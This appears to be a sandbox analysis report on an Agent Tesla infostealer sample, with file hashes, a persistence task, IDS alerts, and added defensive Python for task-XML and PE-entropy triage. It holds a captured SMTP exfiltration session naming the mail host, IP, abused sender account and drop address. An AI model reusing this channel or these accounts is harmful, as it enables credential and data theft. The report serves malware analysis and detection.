                                SHA-256:F1DE5CA103033A002DD48D00DCB9E3ECB30738BD12C7DF1B244A99C4E8092296
                                SHA-512:537BA2C07C10CBAC8382E41DD4A37574A2074542F2F9A9383288AB451766E97E6040322AC6DE2E9D90E4B37679A5F69C65C850FDD7FB7154132FAE02C74FF857
                                Malicious:true
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
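The task XML above is the persistence mechanism: a LogonTrigger task that runs under the author's InteractiveToken at LeastPrivilege, dropped first by the original sample and again by its copy under %APPDATA%. The Python below is an added example, not part of the Joe Sandbox report, that parses such a task definition the way it sits on disk (UTF-16 with a BOM, as the declaration says) and flags a logon-triggered task whose Exec command lives in a user-writable directory. The embedded sample XML is constructed from the fields visible in the preview; its Actions block is an assumption, since the preview is cut off before that element, and points at the dropped copy in AppData\Roaming. The directory list is also an assumption to tune per environment.

```python
import xml.etree.ElementTree as ET

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

# Launch locations a logon-triggered task from a normal installer would rarely
# use (assumption; extend for your estate).
USER_WRITABLE_ROOTS = (
    "\\appdata\\roaming\\",
    "\\appdata\\local\\temp\\",
    "\\users\\public\\",
    "\\windows\\temp\\",
)


def _q(tag: str) -> str:
    """Qualify a tag with the Task Scheduler schema namespace."""
    return f"{{{TASK_NS}}}{tag}"


def _text(node, path: str, default: str = "") -> str:
    found = node.find(path)
    return (found.text or "").strip() if found is not None else default


def inspect_task_xml(data: bytes) -> dict:
    """Summarise trigger, principal and Exec actions of a task XML and flag a
    logon-triggered task that launches from a user-writable directory."""
    root = ET.fromstring(data)  # expat honours the UTF-16 BOM on the file
    logon = root.find(f"{_q('Triggers')}/{_q('LogonTrigger')}")
    # <Enabled> defaults to true when the element is omitted
    logon_enabled = logon is not None and _text(logon, _q("Enabled"), "true").lower() == "true"
    run_level = _text(root, f"{_q('Principals')}/{_q('Principal')}/{_q('RunLevel')}")
    commands = [_text(exec_node, _q("Command")) for exec_node in root.iter(_q("Exec"))]
    suspicious = logon_enabled and any(
        root_dir in cmd.lower() for cmd in commands for root_dir in USER_WRITABLE_ROOTS
    )
    return {
        "author": _text(root, f"{_q('RegistrationInfo')}/{_q('Author')}"),
        "logon_trigger": logon_enabled,
        "run_level": run_level,
        "commands": commands,
        "suspicious": suspicious,
    }


# Constructed sample: fields copied from the dropped task XML preview; the
# Actions block is an assumption (the preview ends before it).
SAMPLE_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\VKkzqGUhsZwwm.exe</Command>
    </Exec>
  </Actions>
</Task>
""".encode("utf-16")  # BOM + UTF-16, matching how Task Scheduler writes the file

if __name__ == "__main__":
    print(inspect_task_xml(SAMPLE_TASK_XML))
```

The same function works on the XML exported by `schtasks /Query /XML /TN <name>` or read from C:\Windows\System32\Tasks, which is where to look for the registered copy during incident response.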
                                Process:C:\Users\user\Desktop\P020241901.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):631296
                                Entropy (8bit):7.9882381176484145
                                Encrypted:false
                                SSDEEP:12288:ripUWpDRbyAAMNPOtta6rE9y4+HQi4ieitahh6j:riaWPbyXMNPOtkIEowi4UtaSj
                                MD5:F061401DD36DC8E88017EF9F9A43E5A7
                                SHA1:EA4D27815A1CF0F447FAB333BDD52825E32807E3
                                SHA-256:935319064E3A30103096A9241C2467B7D19FDBD371D078554A1A7503E1A92CDD
                                SHA-512:91B74C01069A22F00E50C80174BBA8D8D1379D11B51FB09027A18EFD71A465507BA747185F36D670824EAA84B1BB2B49C81B310D04DAFC22B3B5C0A55FEA945A
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 66%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7................0.............f.... ........@.. ....................................@.....................................O....... ...........................p...p............................................ ............... ..H............text...l.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................H.......H.......X,...............C...d............................................r...p..'...%..&.(....}......}.....(.......(.....*..0..<.........{....o......{....o.......(.....s......{.....o......o....&*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....s....}.....s....}.....( .....{.... .... ....s!...o".....{....r!..po#.....r1..po$...t.....s%....s%...%.5o&....%.8o&....%.Ho&.....s%...%.8o&....%.5o&......s%...%.4o&....%.Ho&....%.4o&......
                                Process:C:\Users\user\Desktop\P020241901.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:false
                                Preview:[ZoneTransfer]....ZoneId=0
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.9882381176484145
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:P020241901.exe
                                File size:631'296 bytes
                                MD5:f061401dd36dc8e88017ef9f9a43e5a7
                                SHA1:ea4d27815a1cf0f447fab333bdd52825e32807e3
                                SHA256:935319064e3a30103096a9241c2467b7d19fdbd371d078554a1a7503e1a92cdd
                                SHA512:91b74c01069a22f00e50c80174bba8d8d1379d11b51fb09027a18efd71a465507ba747185f36d670824eaa84b1bb2b49c81b310d04dafc22b3b5c0a55fea945a
                                SSDEEP:12288:ripUWpDRbyAAMNPOtta6rE9y4+HQi4ieitahh6j:riaWPbyXMNPOtkIEowi4UtaSj
                                TLSH:EFD4232F36D8A7A1D8B9A7F91F31105123E5E382E088FA690BDA399D36533F50504B97
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7................0.............f.... ........@.. ....................................@................................
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0x49b566
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x9A0837A8 [Wed Nov 22 01:36:40 2051 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                Instruction
jmp dword ptr [00402000h]        ; native entry stub: jump through the IAT at 0x402000 (mscoree.dll!_CorExeMain)
add byte ptr [eax], al           ; repeated for the rest of the listing: zero bytes following the stub decode as this instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b514 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9c000 | 0x620 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9e000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a870 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9956c | 0x99600 | 6fed7369000d8ff95e1a875f99c665f2 | False | 0.9883226365118174 | data | 7.992542733514758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x9c000 | 0x620 | 0x800 | f803d6e5bcf7e80b07669ae1dff24843 | False | 0.33544921875 | data | 3.4494112256368665 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x9e000 | 0xc | 0x200 | 9f1a6c5140e29d73dc5109cb0f0860fb | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x9c090 | 0x390 | data | | | 0.42105263157894735
RT_MANIFEST | 0x9c430 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
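The header and section table above carry the two static indicators the report raises before anything executes: a COFF link timestamp of 0x9A0837A8 (November 2051, later than the analysis date) and a .text section flagged IMAGE_SCN_CNT_CODE whose entropy is 7.99, which is what a packed or encrypted .NET payload looks like. The Python below is an added example, not code from the Joe Sandbox report, that reproduces both checks with only the standard library: it walks the COFF header and section headers, computes Shannon entropy over each section's raw bytes, and flags executable sections above a threshold plus a timestamp in the future. The image it builds is constructed for the demonstration: the machine type, timestamp, section names and characteristics are taken from the report; the section contents, the optional-header layout and the 7.5 entropy threshold are assumptions.

```python
import math
import random
import struct
from datetime import datetime, timedelta, timezone

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
FILE_ALIGNMENT = 0x200


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(blob: bytes) -> dict:
    """Read the COFF header and section table of a PE image (no pefile needed)."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", blob, coff + 20 + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
            "entropy": shannon_entropy(blob[raw_ptr:raw_ptr + raw_size]),
            "characteristics": flags,
        })
    return {"machine": machine, "timestamp": timestamp, "sections": sections}


def triage(pe: dict, analysed_at_epoch: int, entropy_threshold: float = 7.5) -> list:
    """Static findings: future link time, and executable sections that look packed."""
    findings = []
    if pe["timestamp"] > analysed_at_epoch:
        built = datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=pe["timestamp"])
        findings.append(f"suspicious timestamp: link time {built:%Y-%m-%d} is in the future")
    for s in pe["sections"]:
        executable = s["characteristics"] & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)
        if executable and s["entropy"] > entropy_threshold:
            findings.append(f"packed or encrypted code: {s['name']} entropy {s['entropy']:.2f}")
    return findings


def build_sample_pe() -> bytes:
    """Constructed test image, not the real sample: header values copied from the
    report, section bodies synthesised (pseudo-random .text, zero-filled .reloc)."""
    rng = random.Random(1410986)
    sections = [
        (b".text", 0x2000, bytes(rng.getrandbits(8) for _ in range(0x800)),
         IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".rsrc", 0x9C000, b"VS_VERSION_INFO" * 20,
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
        (b".reloc", 0x9E000, b"\0" * 0xC,
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ),
    ]
    align = lambda n: -(-n // FILE_ALIGNMENT) * FILE_ALIGNMENT
    opt_size = 0xE0  # PE32 optional header; its contents are not needed for these checks
    hdr = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0")
    hdr += struct.pack("<HHIIIHH", 0x14C, len(sections), 0x9A0837A8, 0, 0, opt_size, 0x0102)
    hdr += b"\0" * opt_size
    raw_ptr = align(len(hdr) + 40 * len(sections))
    bodies = bytearray()
    for name, va, body, flags in sections:
        raw_size = align(len(body))
        hdr += struct.pack("<8sIIIIIIHHI", name, len(body), va, raw_size,
                           raw_ptr + len(bodies), 0, 0, 0, 0, flags)
        bodies += body.ljust(raw_size, b"\0")
    return bytes(hdr.ljust(raw_ptr, b"\0")) + bytes(bodies)


ANALYSIS_DATE_EPOCH = 1710720000  # 2024-03-18 00:00 UTC, the report's analysis day

if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    for s in pe["sections"]:
        print(f"{s['name']:<8} entropy={s['entropy']:.3f} flags=0x{s['characteristics']:08x}")
    print(triage(pe, ANALYSIS_DATE_EPOCH))
```

Point `parse_pe` at a real file with `parse_pe(open(path, "rb").read())`; the .NET entry stub and the IAT are irrelevant to it, so it works on native and managed images alike. A future timestamp is a strong tell only because the .NET linker normally writes the real build time; some toolchains deliberately write a hash there, so treat the entropy finding as the higher-confidence signal of the two.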
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/18/24-14:32:22.806223 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49711 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:22.806223 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49711 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:22.806223 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49711 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:19.942080 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49708 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:22.806223 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49711 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:19.942080 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49708 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:19.942146 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49708 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:19.942146 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49708 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:22.806192 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49711 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:22.806192 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49711 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:19.942146 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49708 | 587 | 192.168.2.5 | 203.82.48.116
03/18/24-14:32:19.942146 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 18, 2024 14:32:17.089112997 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:17.386487007 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:17.386702061 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:17.686007977 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:17.686680079 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:17.985995054 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:17.986032963 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:18.140448093 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:18.438422918 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:18.439279079 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:18.450187922 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:18.747550964 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:18.747576952 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:18.747899055 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:19.045941114 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:19.046175957 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:19.344685078 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:19.344870090 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:19.643093109 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:19.643418074 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:19.941389084 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:19.942080021 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:19.942146063 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:19.942173004 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:19.942204952 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:20.108503103 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:20.239593029 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:20.406567097 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:20.406672001 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:20.705231905 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:20.705467939 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:21.003506899 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:21.003885984 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:21.011807919 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:21.309736967 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:21.311292887 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:21.311584949 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:21.609409094 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:21.609652996 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:21.609921932 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:21.908092976 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:21.908449888 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:22.207530975 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:22.207885027 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:22.506844044 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:22.507055044 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:22.805356026 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:22.806191921 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:22.806222916 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:22.806255102 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:22.806255102 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:23.104370117 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:30.138117075 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:30.178833008 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:32:32.154854059 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:32:32.210038900 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:33:56.911725044 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:33:57.209305048 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:33:57.209341049 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:33:57.209572077 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:33:57.209693909 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:33:57.553703070 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:33:57.851042032 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:34:00.117048979 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:34:00.415091991 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:34:00.415136099 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Mar 18, 2024 14:34:00.415267944 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:34:00.415498018 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116
Mar 18, 2024 14:34:00.713021994 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 18, 2024 14:32:16.886714935 CET | 56775 | 53 | 192.168.2.5 | 1.1.1.1
Mar 18, 2024 14:32:17.073313951 CET | 53 | 56775 | 1.1.1.1 | 192.168.2.5
Mar 18, 2024 14:32:17.997617006 CET | 52507 | 53 | 192.168.2.5 | 1.1.1.1
Mar 18, 2024 14:32:18.117674112 CET | 53 | 52507 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 18, 2024 14:32:16.886714935 CET | 192.168.2.5 | 1.1.1.1 | 0x9d93 | Standard query (0) | mail.cup.org.pk | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:32:17.997617006 CET | 192.168.2.5 | 1.1.1.1 | 0xc482 | Standard query (0) | _kerberos._tcp.dc._msdcs.cup.org.pk | 33 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 18, 2024 14:32:17.073313951 CET | 1.1.1.1 | 192.168.2.5 | 0x9d93 | No error (0) | mail.cup.org.pk | | 203.82.48.116 | A (IP address) | IN (0x0001) | false
Mar 18, 2024 14:32:18.117674112 CET | 1.1.1.1 | 192.168.2.5 | 0xc482 | Name error (3) | _kerberos._tcp.dc._msdcs.cup.org.pk | none | none | 33 | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Mar 18, 2024 14:32:17.686007977 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5 | 220 frontend.nayatel.com Axigen ESMTP ready
Mar 18, 2024 14:32:17.686680079 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116 | EHLO 210979
Mar 18, 2024 14:32:17.986032963 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5 | 250-frontend.nayatel.com Axigen ESMTP hello
    250-PIPELINING
    250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
    250-AUTH=PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
    250-8BITMIME
    250-BINARYMIME
    250-CHUNKING
    250-SIZE 2097152000
    250-STARTTLS
    250-HELP
    250 OK
Mar 18, 2024 14:32:18.140448093 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116 | AUTH gssapi TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
Mar 18, 2024 14:32:18.439279079 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5 | 535 Authentication failed
Mar 18, 2024 14:32:18.450187922 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116 | AUTH login bmFzZWVyQGN1cC5vcmcucGs=
Mar 18, 2024 14:32:18.747576952 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5 | 334 UGFzc3dvcmQ6
Mar 18, 2024 14:32:19.045941114 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5 | 235 Authentication successful
Mar 18, 2024 14:32:19.046175957 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116 | MAIL FROM:<naseer@cup.org.pk>
Mar 18, 2024 14:32:19.344685078 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5 | 250 Sender accepted
Mar 18, 2024 14:32:19.344870090 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116 | RCPT TO:<admin@glamourstorepa.com.br>
Mar 18, 2024 14:32:19.643093109 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5 | 250 Recipient accepted
Mar 18, 2024 14:32:19.643418074 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116 | DATA
Mar 18, 2024 14:32:19.941389084 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5 | 354 Ready to receive data; remember <CRLF>.<CRLF>
